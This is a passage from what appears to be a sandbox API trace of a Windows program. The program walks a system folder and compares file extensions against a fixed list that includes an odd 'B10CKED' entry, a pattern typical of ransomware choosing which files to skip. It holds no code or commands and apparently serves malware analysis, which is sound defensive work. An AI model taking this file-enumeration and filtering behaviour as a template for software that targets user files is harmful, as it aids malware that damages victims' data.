lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0108.038] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0108.038] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0108.038] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0108.038] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0108.038] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\*.*", lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0x1c7f68 [0108.103] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0108.103] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0108.103] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*.*", lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0x1c7fa8 [0108.103] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0108.103] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0108.103] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0x1c7fe8 [0108.180] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.180] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 
[0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", 
cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.180] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, 
lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="PNG", cchCount2=3) returned 3 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="PNG", cchCount2=3) returned 3 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="PNG", cchCount2=3) returned 3 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0108.181] 
CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="XML", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="XML", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, 
lpString2="XML", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="XML", cchCount2=3) returned 2 [0108.182] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="PNG", 
cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.183] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="PNG", cchCount2=3) 
returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="PNG", cchCount2=3) returned 3 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="PNG", cchCount2=3) returned 3 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="PNG", cchCount2=3) returned 3 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="PNG", cchCount2=3) returned 
3 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0108.184] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0108.185] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device 
